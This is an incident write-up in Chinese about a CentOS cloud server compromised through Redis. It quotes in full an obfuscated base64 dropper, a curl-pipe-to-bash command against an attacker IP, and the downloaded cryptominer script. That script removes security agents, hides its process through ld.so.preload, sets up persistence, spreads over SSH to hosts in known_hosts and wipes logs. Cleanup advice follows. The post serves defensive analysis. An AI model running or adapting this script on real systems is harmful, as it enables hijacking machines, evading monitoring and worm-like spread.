centos病毒
# Stage-1 dropper as found on the compromised host, kept verbatim for analysis.
# The listing appears to have been collapsed onto one line when pasted (shebang,
# `exec`, and the pipeline would normally be three lines), so as written the whole
# line is a comment to bash.
# What it does, read token by token: `exec &>/dev/null` silences stdout/stderr for
# the rest of the script; `{echo,<blob>}` is brace expansion for `echo <blob>` and
# `{base64,-d}` for `base64 -d`, so the inline base64 blob is decoded and piped
# straight into `bash`. Spelling the commands via brace expansion avoids the
# literal strings `echo ` / `base64 -d`, which is presumably meant to slip past
# naive pattern matching.
# Detection hint for defenders: a `base64 -d` (or `{base64,-d}`) stage feeding
# `| bash`, combined with output suppressed to /dev/null, is a strong indicator in
# cron entries, Redis keys, or shell history; the decoded blob is the piece that
# carried the URL flagged by the alert described below.
#!/bin/bash exec &>/dev/null {echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4Kc2xlZXAgJCg oUkFORE9NICUgNjAwKSkKKHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuaW8vY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJh cGlkN2NwZnFud3hvZG8udG9yMndlYi5pby9jcm9uLnNoIHx8IHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc 2ggfHwgY3VybCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc2ggfHwgd2dldCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIHJhcGlkN2NwZnFud3 hvZG8ub25pb24uc2gvY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJhcGlkN2NwZnFud3hvZG8ub25pb24uc2gvY3Jvbi5zaCApfGJhc2gK}|{base64,-d}|bash
事件回顾:阿里云服务器中毒,收到了云盾的短信告警通知。
事件说明:云盾基于大数据机器学习检测引擎,检测到您的服务器正在尝试访问一个可疑Host URL,产生该告警的原因可能是该URL很少见; 该指令历史上没被执行过; 或者该URL和恶意软件相关等原因。 检测到服务器上Redis漏洞被黑客利用向磁盘上写入了可疑文件,可能导致黑客直接获取ECS的Root权限。请及时修复Redis配置漏洞 解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件。并及时清理已运行的恶意进程。 按照下列链接进行redis配置漏洞的修复 https://help.aliyun.com/knowledge_detail/37447.html。 https://help.aliyun.com/knowledge_detail/37433.html。 同时删除告警详情中被恶意写入的ssh key文件,防止被黑客重复2次入侵。 渗透命令:/bin/sh -c curl -o- http://121.41.24.142/a7 | bash >/dev/null 2>&1 || true 其中http://121.41.24.142/a7文件内容如下,供大家参考:1 #/bin/bash 2 if [ -f /tmp/.a10 ]; then 3 exit 101 4 fi 5 touch /tmp/.a10 6 function clean () { 7 rm -f /tmp/.a10 8 } 9 10 for f in /var/spool/cron/* /var/spool/cron/crontabs/* /etc/*crontab /etc/cron.d/*; do 11 if grep -i -q redis "$f"; then echo > "$f"; fi 12 done 13 14 if [ -f /etc/ld.so.preload ]; then 15 mv -f /etc/ld.so.preload /etc/ld.so.pre 16 fi 17 chmod -x /etc/xig 18 chmod -x /root/cranberry /tmp/cranberry /root/yam 19 chmod -x /etc/root.sh 20 chmod -x /usr/bin/gpg-agentd 21 chmod -x /usr/bin/kworker 22 chmod -x /usr/local/bin/gpg-agentd 23 killall -9 xig 24 killall -9 cranberry 25 killall -9 root.sh 26 killall -9 gpg-agentd 27 killall -9 .gpg-agent 28 killall -9 xmr-stak 29 killall -9 kworker 30 killall -9 .gpg 31 killall -9 pnscan 32 killall -9 netfs 33 killall -9 geth 34 pkill -f stratum 35 pkill -f nativesvc 36 pkill -f cryptonight 37 pkill -f minerd 38 pkill -f conn.sh 39 pkill -f /opt/yilu/ 40 pkill -f /tmp/ 41 pkill -f .cmd 42 pkill -f kworker 43 if grep monero7 /etc/x7/pools.txt; then 44 killall x7 45 rm -rf /etc/x7 46 fi 47 running= 48 killall x7 49 #if ps aux | grep '[b]in/x7'; then 50 # running=1 51 #fi 52 if [ -f /etc/ld.so.pre ]; then 53 mv -f /etc/ld.so.pre /etc/ld.so.preload 54 fi 55 if ! /sbin/iptables -n -L | grep -q 165.225.157.157; then 56 iptables -A INPUT -s 165.225.157.157 -j DROP 57 iptables -A OUTPUT -d 165.225.157.157 -j DROP 58 fi 59 while read h; do 60 if ! 
grep -q "$h" /etc/hosts; then 61 echo "$h" >> /etc/hosts 62 fi 63 done < <(echo ' 64 0.0.0.0 transfer.sh 65 0.0.0.0 static.cortins.tk 66 0.0.0.0 xcn1.yiluzhuanqian.com 67 0.0.0.0 www.yiluzhuanqian.com 68 0.0.0.0 xmr.yiluzhuanqian.com 69 0.0.0.0 xmr.f2pool.com 70 0.0.0.0 stratum.f2pool.com 71 0.0.0.0 xmr.crypto-pool.fr 72 0.0.0.0 jw-js1.ppxxmr.com 73 0.0.0.0 fr.minexmr.com 74 0.0.0.0 pool.minexmr.com 75 0.0.0.0 img.namunil.com 76 0.0.0.0 cdn.namunil.com 77 0.0.0.0 chrome.zer0day.ru 78 0.0.0.0 pool.t00ls.ru 79 0.0.0.0 monerohash.com 80 0.0.0.0 z.chakpools.com 81 ') 82 if [[ "$running" -eq "1" ]]; then 83 clean 84 exit 0 85 fi 86 87 os=$(egrep -i 'debian|ubuntu|cent' -o -- /etc/issue) 88 os="${os,,}" 89 if [ -z "$os" ] && type yum; then os='cent'; fi 90 if ! grep -q 8.8.8.8 /etc/resolv.conf; then 91 echo nameserver 8.8.8.8 >> /etc/resolv.conf 92 fi 93 if ! grep -q 1.1.1.1 /etc/resolv.conf; then 94 echo nameserver 1.1.1.1 >> /etc/resolv.conf 95 fi 96 97 if [ "$os" = 'cent' ]; then 98 yum install -y at unzip wget bzip2 hwloc-devel openssl openssl-devel 99 else 100 apt-get update 101 apt-get install -y at unzip wget hwloc 102 fi 103 104 if ps aux | grep -i '[a]liyun'; then 105 wget http://update.aegis.aliyun.com/download/uninstall.sh 106 chmod +x uninstall.sh 107 ./uninstall.sh 108 wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh 109 chmod +x quartz_uninstall.sh 110 ./quartz_uninstall.sh 111 rm -f uninstall.sh quartz_uninstall.sh 112 pkill aliyun-service 113 rm -fr /etc/init.d/agentwatch /usr/sbin/aliyun-service 114 rm -rf /usr/local/aegis*; 115 elif ps aux | grep -i '[y]unjing'; then 116 /usr/local/qcloud/stargate/admin/uninstall.sh 117 /usr/local/qcloud/YunJing/uninst.sh 118 /usr/local/qcloud/monitor/barad/admin/uninstall.sh 119 fi 120 121 cd /etc; wget --no-check-certificate http://121.41.24.142/${os}.tar.gz -O x7.tar.gz; tar -xvf x7.tar.gz && rm -f x7.tar.gz 122 /sbin/sysctl -w vm.nr_hugepages=128 123 chown -R root:root /etc/x7 124 (cd /etc/x7; nohup 
nice bin/x7 &) 125 126 if [ -f /etc/rc.sysinit ]; then 127 if ! grep x7 /etc/rc.sysinit; then sed -i '35i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.sysinit; fi 128 elif [ -f /etc/rc.d/init.d/network ]; then 129 if ! grep x7 /etc/rc.d/init.d/network; then sed -i '64i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.d/init.d/network; fi 130 elif [ -f /etc/init.d/networking ]; then 131 if ! grep x7 /etc/init.d/networking; then sed -i '130i(cd /etc/x7; nohup nice bin/x7 &)' /etc/init.d/networking; fi 132 fi 133 134 wget --no-check-certificate https://github.com/gianlucaborello/libprocesshider/archive/master.zip -O master.zip && unzip master.zip && rm -f master.zip && cd libprocesshider-master; 135 sed -i 's/evil_script.py/x7/' processhider.c 136 make && mv libprocesshider.so /usr/local/lib/libjdk.so && echo /usr/local/lib/libjdk.so >> /etc/ld.so.preload && cd .. && rm -rf libprocesshider-master 137 138 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then 139 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://112.74.182.220/a7 | bash >/dev/null 2>&1 &' & done 140 fi 141 142 touch -r /etc/sudoers /etc/x7 /etc/ld.so.preload /etc/hosts 143 echo "echo | tee /var/log/cron /var/spool/mail/root /var/mail/root" | at now + 1 minutes 144 145 clean 146 history -c 147 exit 0
服务器现象:服务器 CPU 突增,且 .ssh/authorized_keys 被写入恶意信息;该文件还被加上了特殊的 i(immutable,不可变)属性,即使是 root 也无法直接删除或修改该文件。
解决:修复 redis 漏洞,先用 chattr -i 取消 authorized_keys 的 i 属性,再清空该文件,防止二次入侵。另外,从上面的脚本可以看到,恶意程序还会在 /etc/x7、/etc/ld.so.preload、crontab、at 任务、/etc/hosts、/etc/resolv.conf 以及 rc.sysinit / init.d 网络启动脚本中留下持久化痕迹,并会利用 known_hosts 里的 IP 通过 ssh 向其他主机扩散,这些位置和相关主机也需要一并排查和清理。